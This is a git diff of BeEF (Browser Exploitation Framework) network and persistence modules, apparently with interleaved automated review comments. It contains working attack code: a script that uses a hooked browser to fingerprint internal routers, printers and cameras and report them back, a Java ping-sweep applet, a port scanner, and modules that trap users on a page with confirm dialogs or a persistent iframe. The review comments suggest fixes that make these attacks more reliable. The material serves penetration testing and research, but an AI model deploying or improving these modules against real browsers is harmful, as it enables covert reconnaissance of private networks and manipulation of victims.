"/ajax_obj/img/running.gif",16,16), + new Array( + "QNAP NAS", + "8080","http",false, + "/ajax_obj/images/qnap_logo_w.gif",115,21), + new Array( + "Belkin Router", + "80","http",false, + "/images/title_2.gif",321,28), + new Array( + "Billion Router", + "80","http",false, + "/customized/logo.gif",318,69), + new Array( + "Billion Router", + "80","http",false, + "/customized/logo.gif",224,55), +// new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59), + new Array( + "Linksys NAS", + "80","http",false, + "/Admin_top.JPG",750,52), + new Array( + "Linksys NAS", + "80","http",false, + "/logo.jpg",194,52), + new Array( + "Linksys Network Camera", + "80","http",false, + "/welcome.jpg",146,250), + new Array( + "Linksys Wireless-G Camera", + "80","http",false, + "/header.gif",750,97), + new Array( + "Cisco IP Phone", + "80","http",false, + "/Images/Logo",120,66), + new Array( + "Snom Phone", + "80","http",false, + "/img/snom_logo.png",168,62), + new Array( + "Dell Laser Printer", + "80","http",false, + "/ews/images/delllogo.gif",100,100), + new Array( + "Brother Printer", + "80","http",false, + "/pbio/brother.gif",144,52), + new Array( + "HP LaserJet Printer", + "80","http",false, + "/hp/device/images/logo.gif",42,27), + new Array( + "HP LaserJet Printer", + "80","http",false, + "/hp/device/images/hp_invent_logo.gif",160,52), + new Array( + "JBoss Application server", + "8080","http",true, + "/images/logo.gif",226,105), +// new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76), + new Array( + "APC InfraStruXure Manager", + "80","http",false, + "/images/Xlogo_Layer-1.gif",342,327), + new Array( + "Barracuda Spam/Virus Firewall", + "8000","http",true, + "/images/powered_by.gif",211,26), + new Array( + "TwonkyMedia Server", + "9000","http",false, + "/images/TwonkyMediaServer_logo.jpg",150,82), +// new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98), +// new Array("VLC Media 
Player","8080","http",false,"/images/white_cross_small.png",9,9), + new Array( + "VMware ESXi Server", + "80","http",false, + "/background.jpeg",1,1100), + new Array( + "Microsoft Remote Web Workplace", + "80","http",false, + "/Remote/images/submit.gif",31,31), + new Array( + "XAMPP", + "80","http",false, + "/xampp/img/xampp-logo-new.gif",200,59), + new Array( + "Xerox Printer", + "80","http",false, + "/printbut.gif",30,30), + new Array( + "Konica Minolta Printer", + "80","http",false, + "/G27_light.gif",206,26), + new Array( + "Epson Printer", + "80","http",false, + "/cyandot.gif",1,1), + new Array( + "HP Printer", + "80","http",false, + "/hp/device/images/hp_invent_logo.gif",160,52), +// new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60), +// new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30), + new Array( + "Zenoss", + "8080","http",false, + "/zport/dmd/favicon.ico",16,16), + new Array( + "BeEF", + "3000","http",false, + "/ui/media/images/beef.png",200,149), + new Array( + "BeEF (PHP)", + "80","http",false, + "/beef/images/beef.gif",32,32), + new Array( + "Wordpress", + "80","http",true, + "/wp-includes/images/wpmini-blue.png",16,16), + new Array( + "Glassfish Server", + "4848","http",false, + "/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200), + new Array( + "pfSense", + "443","https",false, + "/themes/pfsense_ng/images/logo.gif",200,56), + new Array( + "m0n0wall", + "80","http",false, + "/logo.gif",150,47) ); // for each ip for(var i=0; i < ips.length; i++) { // for each url for(var u=0; u < urls.length; u++) { - if(!urls[u][2] && ports != null){ // use default port - var img = new Image; - //console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); - img.id = u; - img.src = "http://"+ips[i]+urls[u][1]+urls[u][3]; - img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id 
%>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } - dom.appendChild(img); - }else{ // iterate to all the specified ports - for(p=0;p', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } - dom.appendChild(img); - } - } + if(!urls[u][3] && ports != null){ // use default port + var img = new Image; + beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); + img.id = u; + img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4]; + img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } + dom.appendChild(img); + } else { // iterate to all the specified ports + for(p=0;p', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } + dom.appendChild(img); + } + } } } }); diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml index 2b87ff7c9..85a0551c4 100644 --- a/modules/network/internal_network_fingerprinting/config.yaml +++ b/modules/network/internal_network_fingerprinting/config.yaml 
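Review bot: The commented-out `// new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76)` was not migrated to the 7-field layout the new header comment documents — it has no protocol column, so re-enabling it would put the image path where the multi-port flag is read (`urls[u][3]`) and shift the width/height indices; it should read `// new Array("Siemens Simatic","80","http",false,"/Images/Siemens_Firmenmarke.gif",115,76),`. In the `else` branch the port loop is still written `for(p=0; ...)` without `var`, so `p` leaks as a global on the hooked page; `for(var p=0; ...)` keeps it local. The new `"https"` fingerprint (pfSense on 443) will only load if the browser already trusts that host's certificate, so a miss there cannot be distinguished from the device being absent — worth a comment on that entry. The enclosing `beef.execute` callback and the `ips`/`ports` setup begin in the earlier hunk.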
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index b4eff3e26..11d84bbd4 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Internal Network Fingerprinting
diff --git a/modules/network/nat_pinning_irc/command.js b/modules/network/nat_pinning_irc/command.js
index 4caef4fef..5785a2796 100644
--- a/modules/network/nat_pinning_irc/command.js
+++ b/modules/network/nat_pinning_irc/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var privateip = '<%= @privateip %>';
 var privateport = '<%= @privateport %>';
diff --git a/modules/network/nat_pinning_irc/config.yaml b/modules/network/nat_pinning_irc/config.yaml
index 784c7e7be..2c16fb586 100644
--- a/modules/network/nat_pinning_irc/config.yaml
+++ b/modules/network/nat_pinning_irc/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb
index a934c79da..d8e2f6b23 100644
--- a/modules/network/nat_pinning_irc/module.rb
+++ b/modules/network/nat_pinning_irc/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Irc_nat_pinning < BeEF::Core::Command
diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js index acddd61ea..f796310e2 100644 --- a/modules/network/ping_sweep/command.js +++ b/modules/network/ping_sweep/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ips = new Array(); diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml index 1e9fa9a7d..9a47db7d4 100644 --- a/modules/network/ping_sweep/config.yaml +++ b/modules/network/ping_sweep/config.yaml 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
index cc8c7120d..3517326b6 100644
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Ping Sweep Module - jgaliana
diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js
index cd5fcc719..75304958d 100644
--- a/modules/network/ping_sweep_java/command.js +++ b/modules/network/ping_sweep_java/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ipRange = "<%= @ipRange %>"; @@ -24,7 +15,7 @@ beef.execute(function() { var internal_counter = 0; var firstMsgSent = false; - beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', "http://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]); + beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]); function waituntilok() { try { diff --git a/modules/network/ping_sweep_java/config.yaml b/modules/network/ping_sweep_java/config.yaml index 5b11939b2..fc6772d17 100644 --- a/modules/network/ping_sweep_java/config.yaml +++ b/modules/network/ping_sweep_java/config.yaml 
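Review bot: `beef.net.httpproto` is used here with no fallback, so if the hook serving this module does not define it (the property is not visible anywhere in this diff) the applet codebase becomes `undefined://host:port/` and the sweep silently never starts. A one-line guard keeps the previous behaviour: `var proto = beef.net.httpproto || "http";` and then `proto+"://"+beef.net.host+":"+beef.net.port+"/"` in the `attachApplet` call. The rest of the `beef.execute` callback, including where `timeout` is read, is outside this hunk.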
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb
index 4342f61f6..ec30195a4 100644
--- a/modules/network/ping_sweep_java/module.rb
+++ b/modules/network/ping_sweep_java/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Ping Sweep Module - jgaliana
diff --git a/modules/network/ping_sweep_java/pingSweep.java b/modules/network/ping_sweep_java/pingSweep.java
index 0459ebc6a..b67a4c8df 100644
--- a/modules/network/ping_sweep_java/pingSweep.java
+++ b/modules/network/ping_sweep_java/pingSweep.java
@@ -1,77 +1,83 @@ -import java.applet.Applet; -import java.io.IOException; -import java.net.InetAddress; -import java.net.UnknownHostException; -import java.util.ArrayList; -import java.util.List; - -/* - * Coded by Michele "antisnatchor" Orru' for the BeEF project. - * Given a single IP or IP range, check without hosts are alive (ping sweep). - */ -public class pingSweep extends Applet { - - public static String ipRange = ""; - public static int timeout = 0; - public static List hostList; - - public pingSweep() { - super(); - return; - } - - public void init(){ - ipRange = getParameter("ipRange"); - timeout = Integer.parseInt(getParameter("timeout")); - } - - //called from JS - public static int getHostsNumber(){ - try{ - hostList = parseIpRange(ipRange); - }catch(UnknownHostException e){ //do something - - } - return hostList.size(); - } - - //called from JS - public static String getAliveHosts(){ - String result = ""; - try{ - result = checkHosts(hostList); - }catch(IOException io){ - //do something - } - return result; - } - - private static List parseIpRange(String ipRange) throws UnknownHostException { - - List addresses = new ArrayList(); - if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 - String[] ips = ipRange.split("-"); - String[] octets = ips[0].split("\\."); - int lowerBound = Integer.parseInt(octets[3]); - int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); - - for (int i = lowerBound; i <= upperBound; i++) { - String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." 
+ i; - addresses.add(InetAddress.getByName(ip)); - } - } else { //single ip: ipRange = 172.31.229.240 - addresses.add(InetAddress.getByName(ipRange)); - } - return addresses; - } - - private static String checkHosts(List inetAddresses) throws IOException { - String alive = ""; - for (InetAddress inetAddress : inetAddresses) { - if (inetAddress.isReachable(timeout)) { - alive += inetAddress.toString() + "\n"; - } - } - return alive; - } -} +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +import java.applet.Applet; +import java.io.IOException; +import java.net.InetAddress; +import java.net.UnknownHostException; +import java.util.ArrayList; +import java.util.List; + +/* + * Coded by Michele "antisnatchor" Orru' for the BeEF project. + * Given a single IP or IP range, check without hosts are alive (ping sweep). + */ +public class pingSweep extends Applet { + + public static String ipRange = ""; + public static int timeout = 0; + public static List hostList; + + public pingSweep() { + super(); + return; + } + + public void init(){ + ipRange = getParameter("ipRange"); + timeout = Integer.parseInt(getParameter("timeout")); + } + + //called from JS + public static int getHostsNumber(){ + try{ + hostList = parseIpRange(ipRange); + }catch(UnknownHostException e){ //do something + + } + return hostList.size(); + } + + //called from JS + public static String getAliveHosts(){ + String result = ""; + try{ + result = checkHosts(hostList); + }catch(IOException io){ + //do something + } + return result; + } + + private static List parseIpRange(String ipRange) throws UnknownHostException { + + List addresses = new ArrayList(); + if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 + String[] ips = ipRange.split("-"); + String[] octets = ips[0].split("\\."); + int lowerBound = Integer.parseInt(octets[3]); 
+ int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); + + for (int i = lowerBound; i <= upperBound; i++) { + String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i; + addresses.add(InetAddress.getByName(ip)); + } + } else { //single ip: ipRange = 172.31.229.240 + addresses.add(InetAddress.getByName(ipRange)); + } + return addresses; + } + + private static String checkHosts(List inetAddresses) throws IOException { + String alive = ""; + for (InetAddress inetAddress : inetAddresses) { + if (inetAddress.isReachable(timeout)) { + alive += inetAddress.toString() + "\n"; + } + } + return alive; + } +} diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js index 415c914e6..643ab15d8 100644 --- a/modules/network/port_scanner/command.js +++ b/modules/network/port_scanner/command.js 
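Review bot: In `getHostsNumber()` the `catch(UnknownHostException e)` is empty, so when `parseIpRange` fails `hostList` stays `null` and the next line's `hostList.size()` throws a NullPointerException inside the applet rather than returning a result the JS side can report; initialise `hostList = new ArrayList();` before the `try` or `return 0;` from the catch, and `getAliveHosts()` has the same silent `catch(IOException io)`. `parseIpRange` also indexes `octets[3]` and `ips[1]` without checking the split lengths, so a malformed `ipRange` parameter ends in ArrayIndexOutOfBoundsException instead of the declared UnknownHostException. The class comment's "check without hosts are alive" should read "check which hosts are alive". Since this hunk re-adds the whole file (apparently a header or line-ending change), none of these issues are introduced by the commit, but it is the natural place to fix them.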
@@ -1,19 +1,10 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];
diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml
index a1ac2d103..190d528ef 100644
--- a/modules/network/port_scanner/config.yaml
+++ b/modules/network/port_scanner/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index 4b0957bdd..e9317b6e8 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Port Scanner Module - javier.marcos
diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js
index 1609bcab7..093149ab4 100644
--- a/modules/persistence/confirm_close_tab/command.js
+++ b/modules/persistence/confirm_close_tab/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 function display_confirm(){
@@ -31,6 +22,7 @@ beef.execute(function() {
 if (e.stopPropagation) {
 e.stopPropagation();
 e.preventDefault();
+ e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
 }
 }
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
index 62bcd36e6..154bcfb64 100644
--- a/modules/persistence/confirm_close_tab/config.yaml
+++ b/modules/persistence/confirm_close_tab/config.yaml
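Review bot: The added `e.returnValue` assignment in the second hunk of command.js sits inside the `if (e.stopPropagation)` branch, so it only runs for event objects that already have the DOM Level 2 methods; the other branch, taken by browsers whose event object lacks stopPropagation, is historically the one that reads `returnValue` for a beforeunload prompt, and it never gets the string. Move the assignment above the `if`, `e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";`, so both paths set it, and consider holding the text in one `var msg` so a future return-string path cannot drift from it. The handler and the enclosing `beef.execute` callback both start and end outside the hunk.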
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
@@ -19,7 +9,7 @@ beef:
 enable: true
 category: "Persistence"
 name: "Confirm Close Tab"
- description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
+ description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12. In Chrome you can't keep opening confirm dialogs."
 authors: ["antisnatchor"]
 target:
 user_notify: ["ALL"]
diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb
index e38abbfd5..8ec20a65b 100644
--- a/modules/persistence/confirm_close_tab/module.rb
+++ b/modules/persistence/confirm_close_tab/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Confirm_close_tab < BeEF::Core::Command
diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js
index 3cf076368..a0179982c 100644
--- a/modules/persistence/iframe_above/command.js
+++ b/modules/persistence/iframe_above/command.js
@@ -1,19 +1,10 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
- beef.session.persistent();
+ beef.dom.persistentIframe();
 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
 });
diff --git a/modules/persistence/iframe_above/config.yaml b/modules/persistence/iframe_above/config.yaml
index 7bff8e43b..9046ab30a 100644
--- a/modules/persistence/iframe_above/config.yaml
+++ b/modules/persistence/iframe_above/config.yaml
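Review bot: The fixed success string `'result=Links have been rewritten to spawn an iFrame.'` is sent on the line after `beef.dom.persistentIframe()` no matter what that call did, so the server-side log records success even when the call threw or returned early. If `persistentIframe()` exposes an outcome, capture it, `var ok = beef.dom.persistentIframe();`, and send a distinct message when `ok` is falsy; if it does not, wrap the call in `try { … } catch (e) { … }` and report the exception text instead of the fixed string. The hunk covers the whole `beef.execute` callback.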
@@ -1,17 +1,7 @@
 #
